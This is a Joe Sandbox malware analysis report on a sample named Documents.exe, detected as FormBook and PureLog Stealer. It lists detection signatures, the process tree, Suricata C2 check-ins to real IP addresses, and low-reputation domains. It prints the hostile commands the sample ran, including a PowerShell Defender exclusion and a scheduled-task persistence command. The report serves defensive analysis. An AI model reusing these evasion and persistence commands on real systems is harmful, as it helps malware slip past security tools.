Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Documents.exe

Overview

General Information

Sample name:Documents.exe
Analysis ID:1564384
MD5:0c0b6ed60e0309998da4ae71469f1d84
SHA1:030176b42aac8f2fd5e0358e817491d3c334a686
SHA256:83b760b0b764a209333a2b903015ff3f6df831faf20be20b836563c54e3370b1
Tags:exeuser-lowmal3
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Documents.exe (PID: 6392 cmdline: "C:\Users\user\Desktop\Documents.exe" MD5: 0C0B6ED60E0309998DA4AE71469F1D84)
    • powershell.exe (PID: 5780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1292 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6460 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 3224 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • vWFGbvOdxI.exe (PID: 1788 cmdline: "C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • systray.exe (PID: 1076 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
          • vWFGbvOdxI.exe (PID: 2848 cmdline: "C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4072 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • uFEeKIucsX.exe (PID: 1848 cmdline: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe MD5: 0C0B6ED60E0309998DA4AE71469F1D84)
    • schtasks.exe (PID: 7064 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2156644192.0000000004359000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000000.00000002.2160027953.0000000005BD0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Documents.exe.5bd0000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.Documents.exe.5bd0000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                9.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents.exe", ParentImage: C:\Users\user\Desktop\Documents.exe, ParentProcessId: 6392, ParentProcessName: Documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", ProcessId: 5780, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents.exe", ParentImage: C:\Users\user\Desktop\Documents.exe, ParentProcessId: 6392, ParentProcessName: Documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", ProcessId: 5780, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe, ParentImage: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe, ParentProcessId: 1848, ParentProcessName: uFEeKIucsX.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp", ProcessId: 7064, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents.exe", ParentImage: C:\Users\user\Desktop\Documents.exe, ParentProcessId: 6392, ParentProcessName: Documents.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", ProcessId: 6460, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents.exe", ParentImage: C:\Users\user\Desktop\Documents.exe, ParentProcessId: 6392, ParentProcessName: Documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe", ProcessId: 5780, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Documents.exe", ParentImage: C:\Users\user\Desktop\Documents.exe, ParentProcessId: 6392, ParentProcessName: Documents.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp", ProcessId: 6460, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-28T09:14:09.542330+010028554641A Network Trojan was detected192.168.2.549809162.0.215.3380TCP
                    2024-11-28T09:14:12.420519+010028554641A Network Trojan was detected192.168.2.549818162.0.215.3380TCP
                    2024-11-28T09:14:14.958104+010028554641A Network Trojan was detected192.168.2.549825162.0.215.3380TCP
                    2024-11-28T09:14:24.466710+010028554641A Network Trojan was detected192.168.2.549847104.18.73.11680TCP
                    2024-11-28T09:14:27.132228+010028554641A Network Trojan was detected192.168.2.549852104.18.73.11680TCP
                    2024-11-28T09:14:29.852129+010028554641A Network Trojan was detected192.168.2.549859104.18.73.11680TCP
                    2024-11-28T09:14:39.904886+010028554641A Network Trojan was detected192.168.2.549882192.185.147.10080TCP
                    2024-11-28T09:14:42.540436+010028554641A Network Trojan was detected192.168.2.549888192.185.147.10080TCP
                    2024-11-28T09:14:45.186578+010028554641A Network Trojan was detected192.168.2.549894192.185.147.10080TCP
                    2024-11-28T09:14:54.482114+010028554641A Network Trojan was detected192.168.2.54991713.248.169.4880TCP
                    2024-11-28T09:14:57.153122+010028554641A Network Trojan was detected192.168.2.54992413.248.169.4880TCP
                    2024-11-28T09:14:59.864734+010028554641A Network Trojan was detected192.168.2.54993013.248.169.4880TCP
                    2024-11-28T09:15:09.062744+010028554641A Network Trojan was detected192.168.2.5499523.33.130.19080TCP
                    2024-11-28T09:15:11.765225+010028554641A Network Trojan was detected192.168.2.5499593.33.130.19080TCP
                    2024-11-28T09:15:14.795351+010028554641A Network Trojan was detected192.168.2.5499653.33.130.19080TCP
                    2024-11-28T09:15:23.873450+010028554641A Network Trojan was detected192.168.2.549984172.67.222.6980TCP
                    2024-11-28T09:15:26.488292+010028554641A Network Trojan was detected192.168.2.549991172.67.222.6980TCP
                    2024-11-28T09:15:29.245975+010028554641A Network Trojan was detected192.168.2.549999172.67.222.6980TCP
                    2024-11-28T09:15:39.491584+010028554641A Network Trojan was detected192.168.2.550007103.249.106.9180TCP
                    2024-11-28T09:15:42.170839+010028554641A Network Trojan was detected192.168.2.550008103.249.106.9180TCP
                    2024-11-28T09:15:44.842297+010028554641A Network Trojan was detected192.168.2.550009103.249.106.9180TCP
                    2024-11-28T09:15:55.805631+010028554641A Network Trojan was detected192.168.2.550011121.43.155.3580TCP
                    2024-11-28T09:15:58.512412+010028554641A Network Trojan was detected192.168.2.550012121.43.155.3580TCP
                    2024-11-28T09:16:01.158695+010028554641A Network Trojan was detected192.168.2.550013121.43.155.3580TCP
                    2024-11-28T09:16:11.036905+010028554641A Network Trojan was detected192.168.2.550015199.192.23.12380TCP
                    2024-11-28T09:16:13.717053+010028554641A Network Trojan was detected192.168.2.550016199.192.23.12380TCP
                    2024-11-28T09:16:16.456673+010028554641A Network Trojan was detected192.168.2.550017199.192.23.12380TCP
                    2024-11-28T09:16:26.085634+010028554641A Network Trojan was detected192.168.2.55001952.60.87.16380TCP
                    2024-11-28T09:16:28.752419+010028554641A Network Trojan was detected192.168.2.55002052.60.87.16380TCP
                    2024-11-28T09:16:31.380140+010028554641A Network Trojan was detected192.168.2.55002152.60.87.16380TCP
                    2024-11-28T09:16:41.545133+010028554641A Network Trojan was detected192.168.2.550023161.97.142.14480TCP
                    2024-11-28T09:16:43.984151+010028554641A Network Trojan was detected192.168.2.550024161.97.142.14480TCP
                    2024-11-28T09:16:46.603798+010028554641A Network Trojan was detected192.168.2.550025161.97.142.14480TCP
                    2024-11-28T09:16:56.364697+010028554641A Network Trojan was detected192.168.2.55002775.2.103.2380TCP
                    2024-11-28T09:16:58.982905+010028554641A Network Trojan was detected192.168.2.55002875.2.103.2380TCP
                    2024-11-28T09:17:01.737260+010028554641A Network Trojan was detected192.168.2.55002975.2.103.2380TCP
                    2024-11-28T09:17:11.556796+010028554641A Network Trojan was detected192.168.2.55003113.248.169.4880TCP
                    2024-11-28T09:17:14.660402+010028554641A Network Trojan was detected192.168.2.55003213.248.169.4880TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeReversingLabs: Detection: 23%
                    Multi AV Scanner detection for submitted file
                    Source: Documents.exeReversingLabs: Detection: 23%
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.4502147682.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2340363739.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2342055723.00000000019E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Documents.exeJoe Sandbox ML: detected
                    Source: Documents.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Documents.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: systray.pdb source: RegSvcs.exe, 00000009.00000002.2340231400.0000000001058000.00000004.00000020.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4499291759.0000000000B18000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2340231400.0000000001058000.00000004.00000020.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4499291759.0000000000B18000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vWFGbvOdxI.exe, 00000010.00000002.4499807449.0000000000E2E000.00000002.00000001.01000000.0000000D.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499818518.0000000000E2E000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000011.00000002.4498880450.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500910385.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2632346908.0000000030C3C000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.0000000004510000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2341815008.000000000435E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2340058980.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.00000000046AE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.0000000004510000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2341815008.000000000435E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2340058980.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.00000000046AE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: RegSvcs.pdb source: systray.exe, 00000011.00000002.4498880450.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500910385.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2632346908.0000000030C3C000.00000004.80000000.00040000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 4x nop then jmp 05F1D0C1h0_2_05F1D22F

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49818 -> 162.0.215.33:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49809 -> 162.0.215.33:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49847 -> 104.18.73.116:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49825 -> 162.0.215.33:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49888 -> 192.185.147.100:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49859 -> 104.18.73.116:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49952 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49894 -> 192.185.147.100:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49959 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 172.67.222.69:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49924 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 172.67.222.69:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49930 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 103.249.106.91:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 103.249.106.91:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 103.249.106.91:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 172.67.222.69:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 121.43.155.35:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 121.43.155.35:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 199.192.23.123:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 52.60.87.163:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 75.2.103.23:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 52.60.87.163:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 161.97.142.144:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 161.97.142.144:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50031 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 199.192.23.123:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 199.192.23.123:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 161.97.142.144:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49852 -> 104.18.73.116:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 75.2.103.23:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 121.43.155.35:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49882 -> 192.185.147.100:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 52.60.87.163:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49965 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 75.2.103.23:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49917 -> 13.248.169.48:80
                    Performs DNS queries to domains with low reputation
                    Source: DNS query: www.6822662.xyz
                    Source: DNS query: www.lingdianyun29.xyz
                    Source: DNS query: www.030002449.xyz
                    Source: Joe Sandbox ViewIP Address: 162.0.215.33 162.0.215.33
                    Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
